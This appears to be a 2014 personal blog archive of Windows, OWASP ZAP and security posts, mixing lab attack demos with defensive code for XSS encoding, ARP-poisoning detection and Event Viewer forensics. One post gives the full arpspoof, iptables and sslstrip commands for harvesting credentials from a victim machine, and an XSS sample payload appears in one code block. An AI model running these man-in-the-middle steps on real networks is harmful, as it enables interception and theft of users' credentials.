Computers, Programming, Technology, Music, Literature

Plug-n-Hack and ZAP: manually changed proxy settings after initial pnh configuration

Plug-n-Hack introduces and proposes new standards to integrate security tools with browsers, enabling communication between them. OWASP ZAP has built-in support for Plug-n-Hack (pnh), which lets you configure Firefox to change its proxy settings so that OWASP ZAP can watch Firefox’s traffic.

Configuration is child’s play. Point your browser to the ZAP proxy address, follow the instructions, and you are done, just like in the gif image below.

Plug-n-Hack and Zap

This changes Firefox to use a proxy configuration provided via the http://localhost:7070/proxy.pac file.

All works.

But if, out of curiosity, you went and changed the Firefox proxy settings to No Proxy, Auto-detect proxy settings for this network, or Use system proxy settings, then Firefox traffic would no longer be proxied through ZAP, which is expected, right? That works just fine.

However, when you want Firefox traffic to be proxied through ZAP again, you would paste the ZAP proxy address (http://localhost:7070/pnh) into Firefox again, and Firefox would then say “A provider with this name has already been configured”.
What is your expectation now?

I don’t know; as a user, my expectation when I paste the http://localhost:7070/pnh URL into Firefox is that it should configure my browser to route its traffic via ZAP. But that does not happen.

How to fix?

You can override the proxy settings yourself. Or you could actually use pnh to clear and remove the configuration and then point Firefox to http://localhost:7070/pnh again.

Press Shift + F2 in Firefox and run these two commands:

pnh config clear 'OWASP ZAP'

pnh config remove 'OWASP ZAP'

Written by gmaran23

November 19, 2014 at 6:13 pm

Windows: Get MAC address from the command line

Windows changes with every version and the UI gets more and more twisted, but for a computer user who works from the command line for administrative tasks, things are pretty much the same.

If you want to gather the list of MAC addresses on a particular computer, run either of the commands below:

1. getmac

getmac

2. find on ipconfig -all

ipconfig -all | find /i "Physical Address"

Written by gmaran23

November 6, 2014 at 2:37 pm

Posted in Windows

Process Explorer vs Process Hacker–Part 1 of 2

Originally posted on chentiangemalc:

Process Explorer the tool we’ve all come to love as “Task Manager on Steroids” has been for many IT pros one of the essential tools in their troubleshooting toolkit. Process Explorer was originally released in 1998 under the name NTHandlEx. Here is a screenshot of version 1.22. Notice the lack of processes in Windows NT 4.0!

By version 2.01 it had been renamed to HandleEx and had added some more process properties and a kill feature.

It wasn’t until 16 June 2001, when Version 5.0 came out, that it got renamed to Process Explorer. (I was hoping to have a screenshot of this version as well but couldn’t find it anywhere…) In any case, as of May 2011 with version 14.12 the tool has come a long way to become one of the most advanced “task manager” tools available:

However an open source project has been working on a competing product since…

Written by gmaran23

September 28, 2014 at 1:27 pm

Posted in Uncategorized

Process Explorer vs Process Hacker–Part 2 of 2

Originally posted on chentiangemalc:

Continuing from Part 1 here http://chentiangemalc.wordpress.com/2011/06/13/process-explorer-vs-process-hackerpart-1-of-2/ we will now compare more advanced features of Process Explorer & Process Hacker.

Run As Options

Both Process Explorer and Process Hacker have “Run” options. Process Explorer has “Run” and “Run As Limited User”, while Process Hacker has “Run”, “Run As Limited User”, and “Run As”.

In both programs “Run As Limited User” will launch the process with “Low” integrity security level on Vista and higher.

However Process Hacker’s Run As is the most powerful with many special options…

User name can be any standard user name but also can include special accounts such as:

We can also select what “type”

Specific sessions can be targeted

as well as Desktops…

Finding Open Handles/DLLs

In Process Hacker this is found via the Hacker | Find Handles or DLLs menu option; in Process Explorer it is via Find | Find Handle or DLL.

The main difference here is…

Written by gmaran23

September 28, 2014 at 1:26 pm

Posted in Uncategorized

Devouring Security: Cross Site Scripting [XSS]

http://www.slideshare.net/gmaran23/insufficient-data-validation-risks-xss

Agenda:

• Risk, Stories & the news
• XSS Anatomy
• Untrusted Data Sources: Well, where did that come from?
• Shouldn’t it be called CSS instead?
• Types of XSS
  - Type 0 [DOM based]
  - Type 1 [Reflected or Non-persistent XSS]
  - Type 2 [Persistent or Stored XSS]
• Live Demo: XSS 101 with alert('hello XSS world')
• Live Demo: Cookie Hijacking and Privilege Escalation
  - Face/Off with John Travolta and Nicolas Cage
• Live Demo: Let’s deploy some key loggers, huh?
• Mitigations
  - Input Sanitization
  - Popular Libraries for .Net, Java, PHP
    - Demo: Input sanitization
  - Whitelists (vs. Blacklists)
  - Output Encoding
    - Contextual
    - Demo: Output Encoding
  - Browser Protections & bypasses
  - Framework Protections & bypasses
  - Content Security Policy (CSP) in brief
• Secure Code reviews: Spot an XSS, how?
• Tools: Do we have an option?
• XSS Buzz and how to Fuzz
• Renowned Cheat sheets
• Further reading & References
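As an added example for the Mitigations part of the agenda (it is not code from the talk or the slides), the Python below shows contextual output encoding for the HTML body, HTML attribute, JavaScript string and URL contexts, and an allowlist check beside a blocklist strip. The attacker-style sample input, the rendering helpers and the username rule are all constructed for the demonstration.

```python
"""Contextual output encoding and allowlist validation, two of the XSS
mitigations in the agenda above. Added example; not code from the talk."""
import html
import json
import re
from urllib.parse import quote

# Constructed attacker-style input, used only to exercise the encoders.
SAMPLE = "<img src=x onerror=alert('xss')>"


def encode_html_body(value: str) -> str:
    """HTML text-node context: entity-encode & < > " ' so no tag can start."""
    return html.escape(value, quote=True)


def encode_html_attr(value: str) -> str:
    """Quoted-attribute context: same entity encoding; the template must always
    quote the attribute (value="..."), or a space in the input starts a new one."""
    return html.escape(value, quote=True)


def encode_js_string(value: str) -> str:
    """JavaScript string-literal context inside <script>: JSON-encode, then also
    neutralise '</' (which would close the script element) and the JS line
    terminators U+2028/U+2029, which JSON does not escape."""
    encoded = json.dumps(value)
    return (encoded.replace("</", "<\\/")
                   .replace("\u2028", "\\u2028")
                   .replace("\u2029", "\\u2029"))


def encode_url_param(value: str) -> str:
    """URL query-parameter context: percent-encode everything, including '/'."""
    return quote(value, safe="")


# Allowlist vs blocklist, the agenda item "Whitelists (vs. Blacklists)".
# Constructed rule: a username is 1-32 letters, digits or underscores.
USERNAME_ALLOWLIST = re.compile(r"^[A-Za-z0-9_]{1,32}$")


def is_valid_username(value: str) -> bool:
    """Allowlist: accept only what a username is allowed to look like."""
    return USERNAME_ALLOWLIST.match(value) is not None


def blocklist_strip(value: str) -> str:
    """Blocklist, for contrast: removes one known-bad token and nothing else, so
    any other vector (another tag, an event handler, a case variant) passes."""
    return value.replace("<script>", "")


def render_vulnerable(name: str) -> str:
    """Untrusted data placed straight into the HTML body (reflected pattern)."""
    return f"<p>Hello {name}</p>"


def render_hardened(name: str) -> str:
    """Same page with body-context output encoding applied at the output point."""
    return f"<p>Hello {encode_html_body(name)}</p>"


def render_script_hardened(name: str) -> str:
    """Same data embedded in a script block, using the JS-string encoder."""
    return f"<script>var user = {encode_js_string(name)};</script>"


if __name__ == "__main__":
    print(render_vulnerable(SAMPLE))
    print(render_hardened(SAMPLE))
    print(render_script_hardened(SAMPLE))
    print("allowlist:", is_valid_username(SAMPLE), "blocklist:", blocklist_strip(SAMPLE))
```

The four encoders are the agenda’s “Contextual” point: the same untrusted string needs a different encoder depending on where it lands, and `html.escape` alone is not enough inside a `<script>` block, which is why `encode_js_string` exists. The blocklist helper shows the other agenda item by contrast: it strips `<script>` and still lets the `<img onerror>` sample through unchanged, while the allowlist rejects it outright.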

 

Does your Autolock Domain Workstation policy fail sometimes? But why?

This article was originally published for www.prowareness.com and can be found at http://www.prowareness.com/blog/does-your-autolock-domain-workstation-policy-fail-sometimes-but-why/

The “Password Protect Screensaver” and “Screen Saver Timeout” settings controlled by group policy make the screen saver kick in after the specified interval of inactivity; on resume the logon screen is displayed, so the workstation needs to be unlocked.

Then the normal procedure, if you are doing it for the first time, is to run GPUPDATE /FORCE. The policy should work as expected; however, if some users or managers keep quibbling about their workstation not getting locked after the specified interval, check whether any of the exceptions below apply.

  1. A video is playing on YouTube or any website that uses a Flash-based or HTML5 video player. This must be the active window.
  2. A video is playing in VLC or Windows Media Player. The main window or application need not have focus; it can be inactive (minimized, or hidden in the system tray).
  3. Audio is playing in VLC or Windows Media Player. The main window or application need not have focus; it can be inactive (minimized, or hidden in the system tray).
  4. An automated test is running, either desktop app automation or browser automation.
  5. A PowerPoint slideshow is in progress.

The moment a computer is joined to the domain, the policy becomes effective; if it did not work, it could be because of the above exceptions or because the computer was not part of the domain. These exceptions hold because each of them tells the operating system that the computer is not idle. If you think this is not the expected behaviour, think how ecstatic you’d be when your screen gets locked while you are enjoying a movie or are in the middle of a presentation.

Written by gmaran23

September 26, 2014 at 2:08 pm

Devouring Security: OWASP ZAP – Successfully Ajax Spidering a website with Authentication

OWASP ZAP – Successfully Ajax Spidering a website with Authentication (Northwind Products Management)

0. Make sure you are proxying via ZAP (I love FoxyProxy)

1. Identify the session cookie

1.1 If the HTTP session is not identified, use the Params tab and flag a cookie as Session Token [alternatively, go to Tools -> Options... -> HTTP Sessions and add a session identifier]

1.2 Go and do some browsing

2. Set an active session from the Http Sessions tab

3. Identify and exclude the Log off request from the spider (and from the scanner and proxy, if required)

Good luck with your Ajax spidering in ZAP!

Marudhamaran Gunasekaran
renouncedthoughts.wordpress.com/
vimeo.com/gmaran23

Also available on YouTube as an official OWASP ZAP video tutorial. Not so HD compared to vimeo. Thanks to Simon Bennetts for feedback and suggestions.

Written by gmaran23

August 29, 2014 at 4:42 pm

Posted in hacks, kali, linux, OWASP, security, Sqli

Devouring Security: Sslstrip and arpspoofing for credential harvesting

You may think you are connecting to a website over SSL, but did you forget to check for https in the address bar?

http://www.thoughtcrime.org/software/sslstrip/

Victim - Windows 7 - 192.168.100.11

Attacker - Kali Linux - 192.168.100.215

arpspoof gateway - 192.168.100.1

• Flip your machine into forwarding mode.

echo "1" > /proc/sys/net/ipv4/ip_forward

• Run arpspoof to convince a network they should send their traffic to you.

arpspoof -i <interface> -t <targetIP> <gatewayIP>

arpspoof -i eth0 -t 192.168.100.11 192.168.100.1

• Set up iptables to redirect HTTP traffic to sslstrip.

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <listenPort>

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

• Run sslstrip.

sslstrip.py -l <listenPort>

sslstrip
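What a defender sees on a host while the above is going on, as an added example that is not part of the post: the Python below compares two constructed ARP cache snapshots in the output format of `arp -n` on Linux and raises an alert when the gateway’s hardware address changes or when one MAC answers for two IP addresses. The MAC addresses are made up; the gateway IP is the one from the lab setup above.

```python
"""Host-side detection of ARP cache poisoning, the technique the post shows.
Added example, not part of the post. Input is the `arp -n` table format on
Linux (Address, HWtype, HWaddress, Flags Mask, Iface)."""
import re
from collections import defaultdict

GATEWAY_IP = "192.168.100.1"  # gateway address from the post's lab setup

# Constructed snapshots (MAC addresses are made up). The second one shows the
# state after the gateway entry has been overwritten with another host's MAC.
ARP_BEFORE = """\
Address                  HWtype  HWaddress           Flags Mask            Iface
192.168.100.1            ether   00:11:22:33:44:01   C                     eth0
192.168.100.215          ether   00:11:22:33:44:55   C                     eth0
"""
ARP_AFTER = """\
Address                  HWtype  HWaddress           Flags Mask            Iface
192.168.100.1            ether   00:11:22:33:44:55   C                     eth0
192.168.100.215          ether   00:11:22:33:44:55   C                     eth0
"""

# IPv4 address, hardware type, then a colon-separated 48-bit MAC.
ARP_LINE = re.compile(
    r"^(\d+\.\d+\.\d+\.\d+)\s+\S+\s+([0-9a-f]{2}(?::[0-9a-f]{2}){5})\s", re.I)


def parse_arp(text: str) -> dict:
    """Map IP -> MAC (lower-cased); the header and incomplete entries are skipped."""
    table = {}
    for line in text.splitlines():
        match = ARP_LINE.match(line)
        if match:
            table[match.group(1)] = match.group(2).lower()
    return table


def duplicate_macs(table: dict) -> dict:
    """MACs that appear for more than one IP, a classic poisoning symptom."""
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}


def gateway_changed(before: dict, after: dict, gateway: str = GATEWAY_IP) -> bool:
    """True when the gateway entry existed before and now points at another MAC."""
    return gateway in before and after.get(gateway) != before[gateway]


def check(before: dict, after: dict, gateway: str = GATEWAY_IP) -> list:
    """Return alert strings; an empty list means nothing suspicious was seen."""
    alerts = []
    if gateway_changed(before, after, gateway):
        alerts.append(f"gateway {gateway} MAC changed "
                      f"{before[gateway]} -> {after.get(gateway)}")
    for mac, ips in duplicate_macs(after).items():
        alerts.append(f"MAC {mac} claimed by {', '.join(ips)}")
    return alerts


if __name__ == "__main__":
    for alert in check(parse_arp(ARP_BEFORE), parse_arp(ARP_AFTER)):
        print("ALERT:", alert)
```

Feed it successive `arp -n` captures from a host or a log collector and forward the alerts. A static ARP entry for the gateway on the host, or Dynamic ARP Inspection on the switch, prevents the poisoning itself; HSTS on the web application is what defeats the sslstrip half, since the browser then refuses to fall back to plain http.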

 

Written by gmaran23

July 4, 2014 at 8:58 pm

Event Viewer – Filtering user events for forensics and audits

This article was originally published for www.prowareness.com and can be found there under the title Event Viewer – Filtering user events for forensics and audits.

Skip the story

Let’s say you are tracking down some user, or trying to find the users that logged in to a shared Windows workstation within a given time frame. Sounds downright easy with Event Viewer, right? Create a custom view or filter the current view of the Windows Logs\Security events, type the user account into the User: textbox, and you should be done. But it does not work, because it is not supposed to work, by design.

Fig: 1

When Event Viewer generates a query for the filter we created to look up a particular user’s activity, it actually associates the SID of that user with the query, and returns 0 events.

Fig: 2

Why did it return 0 events? It is fine that the user name typed into the User: textbox got converted to the SID, but shouldn’t it have listed the activities for that user? If you go to Windows Logs\Security (without any filters), you’d notice that there are actually many events logged for the user name (Account Name:) that you want to filter (ma is the user name in the sample).

Fig: 3

Picking a particular event and clicking Details to view it in XML or friendly view, ma (the user we want to query) is actually the TargetUserName as far as the event viewer database is concerned, and TargetUserSid is the SID associated with the user ma.

Fig: 4

Fig: 5

Let’s pause for a moment and think back. If the SID for the user is called TargetUserSid in the Details view, shouldn’t the query that Event Viewer generated in Fig 2 actually use TargetUserSid instead of UserID?

That is,

<QueryList> 
  <Query Id="0" Path="Security"> 
    <Select Path="Security">*[System[Security[@TargetUserSid='S-1-5-21-458116588-1234567890-1874793278-1000']]]</Select> 
  </Query> 
</QueryList>

instead of

<QueryList> 
  <Query Id="0" Path="Security"> 
    <Select Path="Security">*[System[Security[@UserID='S-1-5-21-458116588-1234567890-1874793278-1000']]]</Select> 
  </Query> 
</QueryList>

Maybe I am mistaken, maybe I do not understand the Event Viewer terminology; I don’t know. All we expect is that when we type the User: we want to filter the logs for, Event Viewer does its own queries and conversions and shows the logs for that particular user. Since that does not work as expected, how do we actually see the Security logs for a user?

Use the XML below when you create the custom filter or when you filter an existing log path. Remember that it is subjectUsername in the XML query.

<QueryList> 
  <Query Id="0" Path="Security"> 
    <Select Path="Security">* [EventData[Data[@Name='subjectUsername']='ma']]</Select> 
  </Query> 
</QueryList>

If there is an easy way, let me know.

Also, below is a table of logon events and logon types, explained by their code. The list is derived from a SANS poster named SANS-Digital-Forensics-and-Incident-Response-Poster-2012.pdf. I lost the hyperlink to that poster, but a more descriptive list can be found at:

http://www.sans.org/reading-room/whitepapers/forensics/windows-logon-forensics-34132

Logon Type   Explanation
2            Logon via console
3            Network Logon
4            Batch Logon
5            Windows Service Logon
7            Credentials used to unlock screen
8            Network logon sending credentials (cleartext)
9            Different credentials used than logged on user
10           Remote interactive logon (RDP)
11           Cached credentials used to logon

Event ID (XP / Win 7)   Explanation
528 / 4624              Successful Logon
529 / 4625              Failed Logon
538 / 4634              Successful Logoff
540 / 4624              Successful Network Logon
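As an added example (it is not the article’s own code), the Python below parses constructed Security events in the XML shape shown in the Details view, selects them by SubjectUserName or TargetUserName the way the article’s custom filter does, emits that filter XML for either field, and decodes LogonType and event ID codes using the two tables above. The events, user names and SIDs are made up for the example. One detail the sample models: in Security-Auditing events the System-level Security element is empty and carries no UserID attribute, which is why the query Event Viewer builds from the User: textbox (Fig 2) has nothing to match.

```python
"""Selecting Windows Security events by user name and decoding logon types.
Added example, not code from the article. Parses constructed 4624/4625/4634
events, filters by SubjectUserName / TargetUserName and maps LogonType codes."""
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Logon types and event IDs as listed in the article's tables.
LOGON_TYPES = {
    2: "Logon via console",
    3: "Network Logon",
    4: "Batch Logon",
    5: "Windows Service Logon",
    7: "Credentials used to unlock screen",
    8: "Network logon sending credentials (cleartext)",
    9: "Different credentials used than logged on user",
    10: "Remote interactive logon (RDP)",
    11: "Cached credentials used to logon",
}
EVENT_IDS = {4624: "Successful Logon", 4625: "Failed Logon", 4634: "Successful Logoff"}

# Constructed sample events; the SID is a placeholder, not a real one. The
# System-level <Security/> is empty in audit events, so there is no UserID to
# match, which is what the article's Fig 2 query runs into.
SAMPLE_EVENTS = [
    """<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>4624</EventID><Security/></System>
  <EventData>
    <Data Name="SubjectUserName">WORKSTATION$</Data>
    <Data Name="TargetUserSid">S-1-5-21-0-0-0-1000</Data>
    <Data Name="TargetUserName">ma</Data>
    <Data Name="LogonType">10</Data>
  </EventData>
</Event>""",
    """<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>4634</EventID><Security/></System>
  <EventData>
    <Data Name="TargetUserSid">S-1-5-21-0-0-0-1000</Data>
    <Data Name="TargetUserName">ma</Data>
    <Data Name="LogonType">10</Data>
  </EventData>
</Event>""",
    """<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>4625</EventID><Security/></System>
  <EventData>
    <Data Name="SubjectUserName">-</Data>
    <Data Name="TargetUserName">bob</Data>
    <Data Name="LogonType">3</Data>
  </EventData>
</Event>""",
]


def parse_event(xml_text: str) -> dict:
    """Flatten one event: EventID, the System-level UserID, every EventData field."""
    root = ET.fromstring(xml_text)
    event = {
        "EventID": int(root.find("e:System/e:EventID", NS).text),
        "SystemUserID": root.find("e:System/e:Security", NS).get("UserID"),
    }
    for data in root.findall("e:EventData/e:Data", NS):
        event[data.get("Name")] = data.text or ""
    return event


def events_for_user(events: list, username: str) -> list:
    """Match the user as subject (who acted) or target (who was logged on)."""
    wanted = username.lower()
    return [e for e in events
            if e.get("SubjectUserName", "").lower() == wanted
            or e.get("TargetUserName", "").lower() == wanted]


def events_for_system_userid(events: list, sid: str) -> list:
    """What the User: textbox filter effectively does: compare System UserID."""
    return [e for e in events if e["SystemUserID"] == sid]


def describe(event: dict) -> str:
    """Readable line combining the event ID and LogonType tables."""
    kind = EVENT_IDS.get(event["EventID"], f"Event {event['EventID']}")
    logon_type = event.get("LogonType")
    if logon_type is None:
        return kind
    meaning = LOGON_TYPES.get(int(logon_type), f"unknown logon type {logon_type}")
    return f"{kind} ({meaning})"


def user_filter_xml(username: str, field: str = "TargetUserName") -> str:
    """Build the Event Viewer XML filter in the article's shape for a Data field."""
    return (
        '<QueryList>\n'
        '  <Query Id="0" Path="Security">\n'
        f"    <Select Path=\"Security\">*[EventData[Data[@Name='{field}']='{username}']]</Select>\n"
        '  </Query>\n'
        '</QueryList>'
    )


if __name__ == "__main__":
    parsed = [parse_event(x) for x in SAMPLE_EVENTS]
    for event in events_for_user(parsed, "ma"):
        print(describe(event))
    print(user_filter_xml("ma", "SubjectUserName"))
```

Matching on both SubjectUserName and TargetUserName matters for the forensics use case: a 4624 for an interactive logon names the workstation’s computer account as the subject and the person as the target, so filtering on one field alone misses half the picture.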

Written by gmaran23

July 4, 2014 at 8:41 pm
